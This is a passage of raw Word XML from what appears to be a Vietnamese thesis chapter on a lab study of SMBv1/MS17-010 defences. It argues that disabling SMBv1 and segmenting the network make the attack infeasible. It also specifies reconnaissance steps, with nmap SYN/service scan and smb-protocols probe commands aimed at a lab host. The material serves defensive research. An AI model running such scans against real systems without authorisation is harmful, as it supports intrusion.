        <w:t xml:space="preserve">), khi tầng đàm phán giao thức bị từ chối, phiên SMBv1 không thể thiết lập. Kẻ tấn công không thể gửi bất kỳ payload hay bản tin khai thác nào vào hệ thống </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>\implies D = \text{False} \implies</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cuộc tấn công bất khả thi vì giao thức cần thiết đã bị loại bỏ khỏi bề mặt dịch vụ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0DBCC4" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Chứng minh bất khả thi ở tầng Phân đoạn mạng (Network Segmentation Level) tại trạng thái $S_3$:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660F8A36" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Bản chất can thiệp:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tường lửa/UTM áp dụng quy tắc lọc gói Stateful Inspection tại cổng vào (Ingress) của VLAN 20, loại bỏ (Drop) toàn bộ gói tin TCP hướng tới cổng 445/139 của VLAN 10 [2].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D361FBE" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Bằng chứng đo lường:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Quy trình kiểm chứng PCAP 3 điểm xác nhận: (a) Kali Linux gửi gói TCP SYN; (b) Tường lửa ghi nhận bản ghi nhật ký Drop; (c) Card mạng máy chủ hoàn toàn không nhận được bất kỳ gói TCP SYN nào từ Kali. Kỹ thuật 1 xác nhận cổng ở trạng thái </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>filtered</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> [8]. Do không có gói tin nào tiếp cận máy chủ, quá trình bắt tay 3 bước TCP không thể khởi tạo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>\implies R = \text{False}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Do </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>R = \text{False}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, toàn bộ chuỗi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S, D, V, E, C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bị ngắt mạch ngay từ tầng mạng. Cuộc tấn công bất khả thi ở tầng mạng vật lý/logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206CABF8" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Nguyên lý chứng minh đối chứng kép (Dual Verification with Business Availability):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040E0AF6" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Một giải pháp an toàn chỉ được công nhận là phòng thủ hiệu quả khi tính bất khả thi của cuộc tấn công không đánh đổi bằng việc làm sập hệ thống (Denial of Service). Thông qua trạm Client tại VLAN 30 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>192.168.30.50</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), nghiên cứu chứng minh: ở cả ba trạng thái phòng thủ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_1, S_2, S_3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, người dùng hợp lệ vẫn kết nối chia sẻ tệp thành công qua SMBv2, đọc/ghi dữ liệu thông suốt. Đây là bằng chứng khoa học khẳng định: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Dịch vụ vẫn tồn tại và phục vụ người dùng hợp lệ, nhưng cuộc tấn công từ phân vùng kiểm thử là BẤT KHẢ THI vì các tiền điều kiện kỹ thuật đã bị bẻ gãy một cách có đo lường và có thể kiểm chứng độc lập ở từng tầng công nghệ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C725E2" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.4. PHƯƠNG PHÁP LUẬN VÀ CHUẨN HÓA KỸ THUẬT THEO MÔ HÌNH BẠCH HỘP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58051083" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Mọi kỹ thuật kiểm thử trong Chương 2 được thiết kế theo cấu trúc chuẩn mực 10 thành phần kỹ thuật, bảo đảm người nghiên cứu nắm bắt chính xác cơ chế tác động nội tại lên giao thức và hệ điều hành:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55576162" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>2.4.1. Kỹ thuật 1: Khảo sát tiếp cận và nhận diện dịch vụ (TCP SYN Scan &amp; Service Detection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143FC6BE" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Input:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Lệnh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>nmap -sS -sV -p 139,445 -n -Pn --reason 192.168.10.20</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB82E34" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Preconditions:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tiền điều kiện </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>R = \text{True}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (tuyến đường mạng thông suốt, không bị chặn bởi tường lửa).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD17029" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Internal Mechanism:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nmap phát sinh gói tin TCP mang cờ SYN tới cổng 445 và 139. Trình điều khiển TCP/IP của máy đích phản hồi gói tin TCP mang cờ SYN-ACK. Nmap ghi nhận cổng ở trạng thái </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> và gửi ngay gói tin TCP RST để giải phóng phiên kết nối mà không hoàn tất bắt tay ba bước. Tiếp đó, Nmap gửi chuỗi đầu dò ứng dụng (Service Probes) để thu thập banner và định danh dịch vụ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>microsoft-ds</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> [6], [8].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C8A4B1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Observation Point:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Giao diện mạng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>eth0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> của Kali Linux và tệp tin bắt gói </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>pcap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tại máy mục tiêu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A63054D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Success Criterion:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cổng TCP 445 hiển thị trạng thái </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, trường lý do ghi nhận </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>syn-ack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, tên dịch vụ định danh chính xác là </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>microsoft-ds</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CF1D23" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Failure Criterion:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cổng hiển thị </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>filtered</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (gói tin bị drop, không có phản hồi hoặc nhận ICMP unreachable) hoặc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>closed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (nhận gói TCP RST từ máy đích).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9D8A1B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Output / Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dữ liệu xuất Nmap định dạng văn bản và tệp XML; bản ghi gói tin TCP bắt tay bắt đầu bằng cờ SYN và phản hồi SYN-ACK trong Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C7DEBD" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Inference Boundary:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Chỉ được phép kết luận máy mục tiêu đang lắng nghe dịch vụ chia sẻ tệp trên cổng 445 (xác nhận tiền điều kiện </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> đạt Cấp độ 1). Không được suy diễn hệ thống có lỗ hổng MS17-010.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB8C396" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Limitation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tường lửa có tính năng giả lập SYN-ACK (SYN Proxy) có thể gây dương tính giả về trạng thái mở cổng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3443E7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">10. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Defense Breakpoint:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bị bẻ gãy khi Tường lửa thực thi quy tắc chặn lưu lượng (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>R = \text{False}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tại trạng thái </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_3</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361E0322" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>2.4.2. Kỹ thuật 2: Thăm dò khả năng đàm phán phương ngữ (Dialect Negotiation Probe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386AFFE6" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Input:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Lệnh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>nmap -p 445 --script smb-protocols 192.168.10.20</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE7FE81" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Preconditions:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>R = \text{True}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S = \text{True}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (cổng TCP 445 mở và dịch vụ phản hồi).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1BA6E8" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Internal Mechanism:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kịch bản NSE hoàn tất bắt tay ba bước TCP, sau đó gửi bản tin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SMB_COM_NEGOTIATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (mã lệnh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0x72</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) chứa danh sách mảng chuỗi </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>phương ngữ từ SMB 1.0 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>NT LM 0.12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) đến SMB 3.1.1. Dịch vụ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>LanmanServer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> của máy đích phân tích danh sách và phản hồi bản tin xác nhận chỉ số phương ngữ được lựa chọn [6], [9].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DED87D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Observation Point:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Lưu lượng phân tích giao thức SMB trong Wireshark tại trạm Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612414D1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Success Criterion:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Đầu ra kịch bản liệt kê danh sách phương ngữ được máy chủ chấp nhận có chứa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>NT LM 0.12 (SMBv1)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403F74DC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Failure Criterion:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Máy chủ từ chối đàm phán, chỉ chấp nhận phương ngữ từ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SMB 2.0.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trở lên, hoặc ngắt kết nối phiên làm việc bằng cờ TCP FIN/RST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D72FB14" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Output / Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Danh mục các phương ngữ do script hiển thị trên màn hình console; gói tin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SMB Negotiate Protocol Response</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trong Wireshark với trường </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Dialect Index</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trỏ tới chuỗi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>NT LM 0.12</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F172255" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
